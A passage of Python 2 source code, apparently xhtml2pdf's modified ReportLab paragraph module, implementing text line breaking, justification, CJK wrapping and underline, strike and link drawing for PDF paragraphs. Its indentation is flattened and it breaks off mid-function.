def _justifyDrawParaLine(tx, offset, extraspace, words, last=0):
setXPos(tx, offset)
text = join(words)
if last:
#last one, left align
tx._textOut(text, 1)
else:
nSpaces = len(words) - 1
if nSpaces:
tx.setWordSpace(extraspace / float(nSpaces))
tx._textOut(text, 1)
tx.setWordSpace(0)
else:
tx._textOut(text, 1)
setXPos(tx, -offset)
return offset
def imgVRange(h, va, fontSize):
"""
return bottom,top offsets relative to baseline(0)
"""
if va == 'baseline':
iyo = 0
elif va in ('text-top', 'top'):
iyo = fontSize - h
elif va == 'middle':
iyo = fontSize - (1.2 * fontSize + h) * 0.5
elif va in ('text-bottom', 'bottom'):
iyo = fontSize - 1.2 * fontSize
elif va == 'super':
iyo = 0.5 * fontSize
elif va == 'sub':
iyo = -0.5 * fontSize
elif hasattr(va, 'normalizedValue'):
iyo = va.normalizedValue(fontSize)
else:
iyo = va
return iyo, iyo + h
_56 = 5. / 6
_16 = 1. / 6
def _putFragLine(cur_x, tx, line):
xs = tx.XtraState
cur_y = xs.cur_y
x0 = tx._x0
autoLeading = xs.autoLeading
leading = xs.leading
cur_x += xs.leftIndent
dal = autoLeading in ('min', 'max')
if dal:
if autoLeading == 'max':
ascent = max(_56 * leading, line.ascent)
descent = max(_16 * leading, -line.descent)
else:
ascent = line.ascent
descent = -line.descent
leading = ascent + descent
if tx._leading != leading:
tx.setLeading(leading)
if dal:
olb = tx._olb
if olb is not None:
xcy = olb - ascent
if tx._oleading != leading:
cur_y += leading - tx._oleading
if abs(xcy - cur_y) > 1e-8:
cur_y = xcy
tx.setTextOrigin(x0, cur_y)
xs.cur_y = cur_y
tx._olb = cur_y - descent
tx._oleading = leading
# Letter spacing
if xs.style.letterSpacing != 'normal':
tx.setCharSpace(int(xs.style.letterSpacing))
ws = getattr(tx, '_wordSpace', 0)
nSpaces = 0
words = line.words
for f in words:
if hasattr(f, 'cbDefn'):
cbDefn = f.cbDefn
kind = cbDefn.kind
if kind == 'img':
#draw image cbDefn,cur_y,cur_x
w = cbDefn.width
h = cbDefn.height
txfs = tx._fontsize
if txfs is None:
txfs = xs.style.fontSize
iy0, iy1 = imgVRange(h, cbDefn.valign, txfs)
cur_x_s = cur_x + nSpaces * ws
tx._canvas.drawImage(cbDefn.image.getImage(), cur_x_s, cur_y + iy0, w, h, mask='auto')
cur_x += w
cur_x_s += w
setXPos(tx, cur_x_s - tx._x0)
elif kind == 'barcode':
barcode = cbDefn.barcode
w = cbDefn.width
h = cbDefn.height
txfs = tx._fontsize
if txfs is None:
txfs = xs.style.fontSize
iy0, iy1 = imgVRange(h, cbDefn.valign, txfs)
cur_x_s = cur_x + nSpaces * ws
barcode.draw(canvas=tx._canvas, xoffset=cur_x_s)
cur_x += w
cur_x_s += w
setXPos(tx, cur_x_s - tx._x0)
else:
name = cbDefn.name
if kind == 'anchor':
tx._canvas.bookmarkHorizontal(name, cur_x, cur_y + leading)
else:
func = getattr(tx._canvas, name, None)
if not func:
raise AttributeError("Missing %s callback attribute '%s'" % (kind, name))
func(tx._canvas, kind, cbDefn.label)
if f is words[-1]:
if not tx._fontname:
tx.setFont(xs.style.fontName, xs.style.fontSize)
tx._textOut('', 1)
elif kind == 'img':
tx._textOut('', 1)
else:
cur_x_s = cur_x + nSpaces * ws
if (tx._fontname, tx._fontsize) != (f.fontName, f.fontSize):
tx._setFont(f.fontName, f.fontSize)
if xs.textColor != f.textColor:
xs.textColor = f.textColor
tx.setFillColor(f.textColor)
if xs.rise != f.rise:
xs.rise = f.rise
tx.setRise(f.rise)
text = f.text
tx._textOut(text, f is words[-1]) # cheap textOut
# XXX Modified for XHTML2PDF
# Background colors (done like underline)
if hasattr(f, "backColor"):
if xs.backgroundColor != f.backColor or xs.backgroundFontSize != f.fontSize:
if xs.backgroundColor is not None:
xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
xs.background_x = cur_x_s
xs.backgroundColor = f.backColor
xs.backgroundFontSize = f.fontSize
# Underline
if not xs.underline and f.underline:
xs.underline = 1
xs.underline_x = cur_x_s
xs.underlineColor = f.textColor
elif xs.underline:
if not f.underline:
xs.underline = 0
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
xs.underlineColor = None
elif xs.textColor != xs.underlineColor:
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
xs.underlineColor = xs.textColor
xs.underline_x = cur_x_s
# Strike
if not xs.strike and f.strike:
xs.strike = 1
xs.strike_x = cur_x_s
xs.strikeColor = f.textColor
# XXX Modified for XHTML2PDF
xs.strikeFontSize = f.fontSize
elif xs.strike:
if not f.strike:
xs.strike = 0
# XXX Modified for XHTML2PDF
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
xs.strikeColor = None
xs.strikeFontSize = None
elif xs.textColor != xs.strikeColor:
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
xs.strikeColor = xs.textColor
xs.strikeFontSize = f.fontSize
xs.strike_x = cur_x_s
if f.link and not xs.link:
if not xs.link:
xs.link = f.link
xs.link_x = cur_x_s
xs.linkColor = xs.textColor
elif xs.link:
if not f.link:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
xs.link = None
xs.linkColor = None
elif f.link != xs.link or xs.textColor != xs.linkColor:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
xs.link = f.link
xs.link_x = cur_x_s
xs.linkColor = xs.textColor
txtlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
cur_x += txtlen
nSpaces += text.count(' ')
cur_x_s = cur_x + (nSpaces - 1) * ws
# XXX Modified for XHTML2PDF
# Underline
if xs.underline:
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
# XXX Modified for XHTML2PDF
# Backcolor
if hasattr(f, "backColor"):
if xs.backgroundColor is not None:
xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
# XXX Modified for XHTML2PDF
# Strike
if xs.strike:
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
if xs.link:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
if tx._x0 != x0:
setXPos(tx, x0 - tx._x0)
def _leftDrawParaLineX( tx, offset, line, last=0):
setXPos(tx, offset)
_putFragLine(offset, tx, line)
setXPos(tx, -offset)
def _centerDrawParaLineX( tx, offset, line, last=0):
m = offset + 0.5 * line.extraSpace
setXPos(tx, m)
_putFragLine(m, tx, line)
setXPos(tx, -m)
def _rightDrawParaLineX( tx, offset, line, last=0):
m = offset + line.extraSpace
setXPos(tx, m)
_putFragLine(m, tx, line)
setXPos(tx, -m)
def _justifyDrawParaLineX( tx, offset, line, last=0):
setXPos(tx, offset)
extraSpace = line.extraSpace
nSpaces = line.wordCount - 1
if last or not nSpaces or abs(extraSpace) <= 1e-8 or line.lineBreak:
_putFragLine(offset, tx, line) # no space modification
else:
tx.setWordSpace(extraSpace / float(nSpaces))
_putFragLine(offset, tx, line)
tx.setWordSpace(0)
setXPos(tx, -offset)
def _sameFrag(f, g):
"""
returns 1 if two ParaFrags map out the same
"""
if (hasattr(f, 'cbDefn') or hasattr(g, 'cbDefn')
or hasattr(f, 'lineBreak') or hasattr(g, 'lineBreak')): return 0
for a in ('fontName', 'fontSize', 'textColor', 'backColor', 'rise', 'underline', 'strike', 'link'):
if getattr(f, a, None) != getattr(g, a, None): return 0
return 1
def _getFragWords(frags):
"""
given a Parafrag list return a list of fragwords
[[size, (f00,w00), ..., (f0n,w0n)],....,[size, (fm0,wm0), ..., (f0n,wmn)]]
each pair f,w represents a style and some string
each sublist represents a word
"""
R = []
W = []
n = 0
hangingStrip = False
for f in frags:
text = f.text
# of paragraphs
if text != '':
if hangingStrip:
hangingStrip = False
text = text.lstrip()
S = split(text)
if S == []:
S = ['']
if W != [] and text[0] in whitespace:
W.insert(0, n)
R.append(W)
W = []
n = 0
for w in S[:-1]:
W.append((f, w))
n += stringWidth(w, f.fontName, f.fontSize)
W.insert(0, n)
R.append(W)
W = []
n = 0
w = S[-1]
W.append((f, w))
n += stringWidth(w, f.fontName, f.fontSize)
if text and text[-1] in whitespace:
W.insert(0, n)
R.append(W)
W = []
n = 0
elif hasattr(f, 'cbDefn'):
w = getattr(f.cbDefn, 'width', 0)
if w:
if W != []:
W.insert(0, n)
R.append(W)
W = []
n = 0
R.append([w, (f, '')])
else:
W.append((f, ''))
elif hasattr(f, 'lineBreak'):
#pass the frag through. The line breaker will scan for it.
if W != []:
W.insert(0, n)
R.append(W)
W = []
n = 0
R.append([0, (f, '')])
hangingStrip = True
if W != []:
W.insert(0, n)
R.append(W)
return R
def _split_blParaSimple(blPara, start, stop):
f = blPara.clone()
for a in ('lines', 'kind', 'text'):
if hasattr(f, a): delattr(f, a)
f.words = []
for l in blPara.lines[start:stop]:
for w in l[1]:
f.words.append(w)
return [f]
def _split_blParaHard(blPara, start, stop):
f = []
lines = blPara.lines[start:stop]
for l in lines:
for w in l.words:
f.append(w)
if l is not lines[-1]:
i = len(f) - 1
while i >= 0 and hasattr(f[i], 'cbDefn') and not getattr(f[i].cbDefn, 'width', 0): i -= 1
if i >= 0:
g = f[i]
if not g.text:
g.text = ' '
elif g.text[-1] != ' ':
g.text += ' '
return f
def _drawBullet(canvas, offset, cur_y, bulletText, style):
"""
draw a bullet text could be a simple string or a frag list
"""
tx2 = canvas.beginText(style.bulletIndent, cur_y + getattr(style, "bulletOffsetY", 0))
tx2.setFont(style.bulletFontName, style.bulletFontSize)
tx2.setFillColor(hasattr(style, 'bulletColor') and style.bulletColor or style.textColor)
if isinstance(bulletText, basestring):
tx2.textOut(bulletText)
else:
for f in bulletText:
if hasattr(f, "image"):
image = f.image
width = image.drawWidth
height = image.drawHeight
gap = style.bulletFontSize * 0.25
img = image.getImage()
# print style.bulletIndent, offset, width
canvas.drawImage(
img,
style.leftIndent - width - gap,
cur_y + getattr(style, "bulletOffsetY", 0),
width,
height)
else:
tx2.setFont(f.fontName, f.fontSize)
tx2.setFillColor(f.textColor)
tx2.textOut(f.text)
canvas.drawText(tx2)
#AR making definition lists a bit less ugly
#bulletEnd = tx2.getX()
bulletEnd = tx2.getX() + style.bulletFontSize * 0.6
offset = max(offset, bulletEnd - style.leftIndent)
return offset
def _handleBulletWidth(bulletText, style, maxWidths):
"""
work out bullet width and adjust maxWidths[0] if neccessary
"""
if bulletText:
if isinstance(bulletText, basestring):
bulletWidth = stringWidth(bulletText, style.bulletFontName, style.bulletFontSize)
else:
#it's a list of fragments
bulletWidth = 0
for f in bulletText:
bulletWidth = bulletWidth + stringWidth(f.text, f.fontName, f.fontSize)
bulletRight = style.bulletIndent + bulletWidth + 0.6 * style.bulletFontSize
indent = style.leftIndent + style.firstLineIndent
if bulletRight > indent:
#..then it overruns, and we have less space available on line 1
maxWidths[0] -= (bulletRight - indent)
def splitLines0(frags, widths):
"""
given a list of ParaFrags we return a list of ParaLines
each ParaLine has
1) ExtraSpace
2) blankCount
3) [textDefns....]
each text definition is a (ParaFrag, start, limit) triplet
"""
#initialise the algorithm
lines = []
lineNum = 0
maxW = widths[lineNum]
i = -1
l = len(frags)
lim = start = 0
while 1:
#find a non whitespace character
while i < l:
while start < lim and text[start] == ' ': start += 1
if start == lim:
i += 1
if i == l: break
start = 0
f = frags[i]
text = f.text
lim = len(text)
else:
break # we found one
if start == lim: break # if we didn't find one we are done
#start of a line
g = (None, None, None)
line = []
cLen = 0
nSpaces = 0
while cLen < maxW:
j = text.find(' ', start)
if j < 0:
j == lim
w = stringWidth(text[start:j], f.fontName, f.fontSize)
cLen += w
if cLen > maxW and line != []:
cLen = cLen - w
#this is the end of the line
while g.text[lim] == ' ':
lim -= 1
nSpaces -= 1
break
if j < 0:
j = lim
if g[0] is f:
g[2] = j #extend
else:
g = (f, start, j)
line.append(g)
if j == lim:
i += 1
def _do_under_line(i, t_off, ws, tx, lm=-0.125):
y = tx.XtraState.cur_y - i * tx.XtraState.style.leading + lm * tx.XtraState.f.fontSize
textlen = tx._canvas.stringWidth(join(tx.XtraState.lines[i][1]), tx._fontname, tx._fontsize)
tx._canvas.line(t_off, y, t_off + textlen + ws, y)
_scheme_re = re.compile('^[a-zA-Z][-+a-zA-Z0-9]+$')
def _doLink(tx, link, rect):
if isinstance(link, unicode):
link = link.encode('utf8')
parts = link.split(':', 1)
scheme = len(parts) == 2 and parts[0].lower() or ''
if _scheme_re.match(scheme) and scheme != 'document':
kind = scheme.lower() == 'pdf' and 'GoToR' or 'URI'
if kind == 'GoToR': link = parts[1]
tx._canvas.linkURL(link, rect, relative=1, kind=kind)
else:
if link[0] == '#':
link = link[1:]
scheme = ''
tx._canvas.linkRect("", scheme != 'document' and link or parts[1], rect, relative=1)
def _do_link_line(i, t_off, ws, tx):
xs = tx.XtraState
leading = xs.style.leading
y = xs.cur_y - i * leading - xs.f.fontSize / 8.0 # 8.0 factor copied from para.py
text = join(xs.lines[i][1])
textlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
_doLink(tx, xs.link, (t_off, y, t_off + textlen + ws, y + leading))
# XXX Modified for XHTML2PDF
def _do_post_text(tx):
"""
Try to find out what the variables mean:
tx A structure containing more informations about paragraph ???
leading Height of lines
ff 1/8 of the font size
y0 The "baseline" postion ???
y 1/8 below the baseline
"""
xs = tx.XtraState
leading = xs.style.leading
autoLeading = xs.autoLeading
f = xs.f
if autoLeading == 'max':
# leading = max(leading, f.fontSize)
leading = max(leading, LEADING_FACTOR * f.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * f.fontSize
ff = 0.125 * f.fontSize
y0 = xs.cur_y
y = y0 - ff
# Background
for x1, x2, c, fs in xs.backgrounds:
inlineFF = fs * 0.125
gap = inlineFF * 1.25
tx._canvas.setFillColor(c)
tx._canvas.rect(x1, y - gap, x2 - x1, fs + 1, fill=1, stroke=0)
xs.backgrounds = []
xs.background = 0
xs.backgroundColor = None
xs.backgroundFontSize = None
# Underline
yUnderline = y0 - 1.5 * ff
tx._canvas.setLineWidth(ff * 0.75)
csc = None
for x1, x2, c in xs.underlines:
if c != csc:
tx._canvas.setStrokeColor(c)
csc = c
tx._canvas.line(x1, yUnderline, x2, yUnderline)
xs.underlines = []
xs.underline = 0
xs.underlineColor = None
# Strike
for x1, x2, c, fs in xs.strikes:
inlineFF = fs * 0.125
ys = y0 + 2 * inlineFF
if c != csc:
tx._canvas.setStrokeColor(c)
csc = c
tx._canvas.setLineWidth(inlineFF * 0.75)
tx._canvas.line(x1, ys, x2, ys)
xs.strikes = []
xs.strike = 0
xs.strikeColor = None
yl = y + leading
for x1, x2, link, c in xs.links:
# No automatic underlining for links, never!
_doLink(tx, link, (x1, y, x2, yl))
xs.links = []
xs.link = None
xs.linkColor = None
xs.cur_y -= leading
def textTransformFrags(frags, style):
tt = style.textTransform
if tt:
tt = tt.lower()
if tt == 'lowercase':
tt = unicode.lower
elif tt == 'uppercase':
tt = unicode.upper
elif tt == 'capitalize':
tt = unicode.title
elif tt == 'none':
return
else:
raise ValueError('ParaStyle.textTransform value %r is invalid' % style.textTransform)
n = len(frags)
if n == 1:
#single fragment the easy case
frags[0].text = tt(frags[0].text.decode('utf8')).encode('utf8')
elif tt is unicode.title:
pb = True
for f in frags:
t = f.text
if not t: continue
u = t.decode('utf8')
if u.startswith(u' ') or pb:
u = tt(u)
else:
i = u.find(u' ')
if i >= 0:
u = u[:i] + tt(u[i:])
pb = u.endswith(u' ')
f.text = u.encode('utf8')
else:
for f in frags:
t = f.text
if not t: continue
f.text = tt(t.decode('utf8')).encode('utf8')
class cjkU(unicode):
"""
simple class to hold the frag corresponding to a str
"""
def __new__(cls, value, frag, encoding):
self = unicode.__new__(cls, value)
self._frag = frag
if hasattr(frag, 'cbDefn'):
w = getattr(frag.cbDefn, 'width', 0)
self._width = w
else:
self._width = stringWidth(value, frag.fontName, frag.fontSize)
return self
frag = property(lambda self: self._frag)
width = property(lambda self: self._width)
def makeCJKParaLine(U, extraSpace, calcBounds):
words = []
CW = []
f0 = FragLine()
maxSize = maxAscent = minDescent = 0
for u in U:
f = u.frag
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
if not _sameFrag(f0, f):
f0 = f0.clone()
f0.text = u''.join(CW)
words.append(f0)
CW = []
f0 = f
CW.append(u)
if CW:
f0 = f0.clone()
f0.text = u''.join(CW)
words.append(f0)
return FragLine(kind=1, extraSpace=extraSpace, wordCount=1, words=words[1:], fontSize=maxSize, ascent=maxAscent,
descent=minDescent)
def cjkFragSplit(frags, maxWidths, calcBounds, encoding='utf8'):
"""
This attempts to be wordSplit for frags using the dumb algorithm
"""
from reportlab.rl_config import _FUZZ
U = [] # get a list of single glyphs with their widths etc etc
for f in frags:
text = f.text
if not isinstance(text, unicode):
text = text.decode(encoding)
if text:
U.extend([cjkU(t, f, encoding) for t in text])
else:
U.append(cjkU(text, f, encoding))
lines = []
widthUsed = lineStartPos = 0
maxWidth = maxWidths[0]
for i, u in enumerate(U):
w = u.width
widthUsed += w
lineBreak = hasattr(u.frag, 'lineBreak')
endLine = (widthUsed > maxWidth + _FUZZ and widthUsed > 0) or lineBreak
if endLine:
if lineBreak: continue
extraSpace = maxWidth - widthUsed + w
#This is the most important of the Japanese typography rules.
#if next character cannot start a line, wrap it up to this line so it hangs
#in the right margin. We won't do two or more though - that's unlikely and
#would result in growing ugliness.
nextChar = U[i]
if nextChar in ALL_CANNOT_START:
extraSpace -= w
i += 1
lines.append(makeCJKParaLine(U[lineStartPos:i], extraSpace, calcBounds))
try:
maxWidth = maxWidths[len(lines)]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
lineStartPos = i
widthUsed = w
i -= 1
#any characters left?
if widthUsed > 0:
lines.append(makeCJKParaLine(U[lineStartPos:], maxWidth - widthUsed, calcBounds))
return ParaLines(kind=1, lines=lines)
class Paragraph(Flowable):
"""
Paragraph(text, style, bulletText=None, caseSensitive=1)
text a string of stuff to go into the paragraph.
style is a style definition as in reportlab.lib.styles.
bulletText is an optional bullet defintion.
caseSensitive set this to 0 if you want the markup tags and their attributes to be case-insensitive.
This class is a flowable that can format a block of text
into a paragraph with a given style.
The paragraph Text can contain XML-like markup including the tags:
<b> ... </b> - bold
<i> ... </i> - italics
<u> ... </u> - underline
<strike> ... </strike> - strike through
<super> ... </super> - superscript
<sub> ... </sub> - subscript
<font name=fontfamily/fontname color=colorname size=float>
<onDraw name=callable label="a label">
<link>link text</link>
attributes of links
size/fontSize=num
name/face/fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
dest/destination/target/href/link=target
<a>anchor text</a>
attributes of anchors
fontSize=num
fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
href=href
<a name="anchorpoint"/>
<unichar name="unicode character name"/>
<unichar value="unicode code point"/>
<img src="path" width="1in" height="1in" valign="bottom"/>
The whole may be surrounded by <para> </para> tags
The <b> and <i> tags will work for the built-in fonts (Helvetica
/Times / Courier). For other fonts you need to register a family
of 4 fonts using reportlab.pdfbase.pdfmetrics.registerFont; then
use the addMapping function to tell the library that these 4 fonts
form a family e.g.
from reportlab.lib.fonts import addMapping
addMapping('Vera', 0, 0, 'Vera') #normal
addMapping('Vera', 0, 1, 'Vera-Italic') #italic
addMapping('Vera', 1, 0, 'Vera-Bold') #bold
addMapping('Vera', 1, 1, 'Vera-BoldItalic') #italic and bold
It will also be able to handle any MathML specified Greek characters.
"""
def __init__(self, text, style, bulletText=None, frags=None, caseSensitive=1, encoding='utf8'):
self.caseSensitive = caseSensitive
self.encoding = encoding
self._setup(text, style, bulletText, frags, cleanBlockQuotedText)
def __repr__(self):
n = self.__class__.__name__
L = [n + "("]
keys = self.__dict__.keys()
for k in keys:
v = getattr(self, k)
rk = repr(k)
rv = repr(v)
rk = " " + rk.replace("\n", "\n ")
rv = " " + rk.replace("\n", "\n ")
L.append(rk)
L.append(rv)
L.append(") #" + n)
return '\n'.join(L)
def _setup(self, text, style, bulletText, frags, cleaner):
if frags is None:
text = cleaner(text)
_parser.caseSensitive = self.caseSensitive
style, frags, bulletTextFrags = _parser.parse(text, style)
if frags is None:
raise ValueError("xml parser error (%s) in paragraph beginning\n'%s'" \
% (_parser.errors[0], text[:min(30, len(text))]))
textTransformFrags(frags, style)
if bulletTextFrags: bulletText = bulletTextFrags
#AR hack
self.text = text
self.frags = frags
self.style = style
self.bulletText = bulletText
self.debug = PARAGRAPH_DEBUG # turn this on to see a pretty one with all the margins etc.
def wrap(self, availWidth, availHeight):
if self.debug:
print id(self), "wrap"
try:
print repr(self.getPlainText()[:80])
except:
print "???"
# work out widths array for breaking
self.width = availWidth
style = self.style
leftIndent = style.leftIndent
first_line_width = availWidth - (leftIndent + style.firstLineIndent) - style.rightIndent
later_widths = availWidth - leftIndent - style.rightIndent
if style.wordWrap == 'CJK':
#use Asian text wrap algorithm to break characters
blPara = self.breakLinesCJK([first_line_width, later_widths])
else:
blPara = self.breakLines([first_line_width, later_widths])
self.blPara = blPara
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
leading = style.leading
if blPara.kind == 1 and autoLeading not in ('', 'off'):
height = 0
if autoLeading == 'max':
for l in blPara.lines:
height += max(l.ascent - l.descent, leading)
elif autoLeading == 'min':
for l in blPara.lines:
height += l.ascent - l.descent
else:
raise ValueError('invalid autoLeading value %r' % autoLeading)
else:
if autoLeading == 'max':
leading = max(leading, LEADING_FACTOR * style.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * style.fontSize
height = len(blPara.lines) * leading
self.height = height
return self.width, height
def minWidth(self):
"""
Attempt to determine a minimum sensible width
"""
frags = self.frags
nFrags = len(frags)
if not nFrags: return 0
if nFrags == 1:
f = frags[0]
fS = f.fontSize
fN = f.fontName
words = hasattr(f, 'text') and split(f.text, ' ') or f.words
func = lambda w, fS=fS, fN=fN: stringWidth(w, fN, fS)
else:
words = _getFragWords(frags)
func = lambda x: x[0]
return max(map(func, words))
def _get_split_blParaFunc(self):
return self.blPara.kind == 0 and _split_blParaSimple or _split_blParaHard
def split(self, availWidth, availHeight):
if self.debug:
print id(self), "split"
if len(self.frags) <= 0: return []
#the split information is all inside self.blPara
if not hasattr(self, 'blPara'):
self.wrap(availWidth, availHeight)
blPara = self.blPara
style = self.style
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
leading = style.leading
lines = blPara.lines
if blPara.kind == 1 and autoLeading not in ('', 'off'):
s = height = 0
if autoLeading == 'max':
for i, l in enumerate(blPara.lines):
h = max(l.ascent - l.descent, leading)
n = height + h
if n > availHeight + 1e-8:
break
height = n
s = i + 1
elif autoLeading == 'min':
for i, l in enumerate(blPara.lines):
n = height + l.ascent - l.descent
if n > availHeight + 1e-8:
break
height = n
s = i + 1
else:
raise ValueError('invalid autoLeading value %r' % autoLeading)
else:
l = leading
if autoLeading == 'max':
l = max(leading, LEADING_FACTOR * style.fontSize)
elif autoLeading == 'min':
l = LEADING_FACTOR * style.fontSize
s = int(availHeight / l)
height = s * l
n = len(lines)
allowWidows = getattr(self, 'allowWidows', getattr(self, 'allowWidows', 1))
allowOrphans = getattr(self, 'allowOrphans', getattr(self, 'allowOrphans', 0))
if not allowOrphans:
if s <= 1: # orphan?
del self.blPara
return []
if n <= s: return [self]
if not allowWidows:
if n == s + 1: # widow?
if (allowOrphans and n == 3) or n > 3:
s -= 1 # give the widow some company
else:
del self.blPara # no room for adjustment; force the whole para onwards
return []
func = self._get_split_blParaFunc()
P1 = self.__class__(None, style, bulletText=self.bulletText, frags=func(blPara, 0, s))
#this is a major hack
P1.blPara = ParaLines(kind=1, lines=blPara.lines[0:s], aH=availHeight, aW=availWidth)
P1._JustifyLast = 1
P1._splitpara = 1
P1.height = height
P1.width = availWidth
if style.firstLineIndent != 0:
style = deepcopy(style)
style.firstLineIndent = 0
P2 = self.__class__(None, style, bulletText=None, frags=func(blPara, s, n))
for a in ('autoLeading', # possible attributes that might be directly on self.
):
if hasattr(self, a):
setattr(P1, a, getattr(self, a))
setattr(P2, a, getattr(self, a))
return [P1, P2]
def draw(self):
#call another method for historical reasons. Besides, I
#suspect I will be playing with alternate drawing routines
#so not doing it here makes it easier to switch.
self.drawPara(self.debug)
def breakLines(self, width):
"""
Returns a broken line structure. There are two cases
A) For the simple case of a single formatting input fragment the output is
A fragment specifier with
- kind = 0
- fontName, fontSize, leading, textColor
- lines= A list of lines
Each line has two items.
1. unused width in points
2. word list
B) When there is more than one input formatting fragment the output is
A fragment specifier with
- kind = 1
- lines= A list of fragments each having fields
- extraspace (needed for justified)
- fontSize
- words=word list
each word is itself a fragment with
various settings
This structure can be used to easily draw paragraphs with the various alignments.
You can supply either a single width or a list of widths; the latter will have its
last item repeated until necessary. A 2-element list is useful when there is a
different first line indent; a longer list could be created to facilitate custom wraps
around irregular objects.
"""
if self.debug:
print id(self), "breakLines"
if not isinstance(width, (tuple, list)):
maxWidths = [width]
else:
maxWidths = width
lines = []
lineno = 0
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText, style, maxWidths)
maxWidth = maxWidths[0]
self.height = 0
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
calcBounds = autoLeading not in ('', 'off')
frags = self.frags
nFrags = len(frags)
if nFrags == 1 and not hasattr(frags[0], 'cbDefn'):
f = frags[0]
fontSize = f.fontSize
fontName = f.fontName
ascent, descent = getAscentDescent(fontName, fontSize)
words = hasattr(f, 'text') and split(f.text, ' ') or f.words
spaceWidth = stringWidth(' ', fontName, fontSize, self.encoding)
cLine = []
currentWidth = -spaceWidth # hack to get around extra space for word 1
for word in words:
#this underscores my feeling that Unicode throughout would be easier!
wordWidth = stringWidth(word, fontName, fontSize, self.encoding)
newWidth = currentWidth + spaceWidth + wordWidth
if newWidth <= maxWidth or not len(cLine):
# fit one more on this line
cLine.append(word)
currentWidth = newWidth
else:
if currentWidth > self.width: self.width = currentWidth
#end of line
lines.append((maxWidth - currentWidth, cLine))
cLine = [word]
currentWidth = wordWidth
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
#deal with any leftovers on the final line
if cLine != []:
if currentWidth > self.width: self.width = currentWidth
lines.append((maxWidth - currentWidth, cLine))
return f.clone(kind=0, lines=lines, ascent=ascent, descent=descent, fontSize=fontSize)
elif nFrags <= 0:
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, ascent=style.fontSize, descent=-0.2 * style.fontSize,
lines=[])
else:
if hasattr(self, 'blPara') and getattr(self, '_splitpara', 0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return self.blPara
n = 0
words = []
for w in _getFragWords(frags):
f = w[-1][0]
fontName = f.fontName
fontSize = f.fontSize
spaceWidth = stringWidth(' ', fontName, fontSize)
if not words:
currentWidth = -spaceWidth # hack to get around extra space for word 1
maxSize = fontSize
maxAscent, minDescent = getAscentDescent(fontName, fontSize)
wordWidth = w[0]
f = w[1][0]
if wordWidth > 0:
newWidth = currentWidth + spaceWidth + wordWidth
else:
newWidth = currentWidth
#test to see if this frag is a line break. If it is we will only act on it
#if the current width is non-negative or the previous thing was a deliberate lineBreak
lineBreak = hasattr(f, 'lineBreak')
endLine = (newWidth > maxWidth and n > 0) or lineBreak
if not endLine:
if lineBreak: continue #throw it away
nText = w[1][1]
if nText: n += 1
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
if not words:
g = f.clone()
words = [g]
g.text = nText
elif not _sameFrag(g, f):
if currentWidth > 0 and ((nText != '' and nText[0] != ' ') or hasattr(f, 'cbDefn')):
if hasattr(g, 'cbDefn'):
i = len(words) - 1
while i >= 0:
wi = words[i]
cbDefn = getattr(wi, 'cbDefn', None)
if cbDefn:
if not getattr(cbDefn, 'width', 0):
i -= 1
continue
if not wi.text.endswith(' '):
wi.text += ' '
break
else:
if not g.text.endswith(' '):
g.text += ' '
g = f.clone()
words.append(g)
g.text = nText
else:
if nText != '' and nText[0] != ' ':
g.text += ' ' + nText
for i in w[2:]:
g = i[0].clone()
g.text = i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
currentWidth = newWidth
else: # either it won't fit, or it's a lineBreak tag
if lineBreak:
g = f.clone()
words.append(g)
if currentWidth > self.width: self.width = currentWidth
#end of line
lines.append(FragLine(extraSpace=maxWidth - currentWidth, wordCount=n,
lineBreak=lineBreak, words=words, fontSize=maxSize, ascent=maxAscent,
descent=minDescent))
#start new line
lineno += 1
try:
maxWidth = maxWidths[lineno]
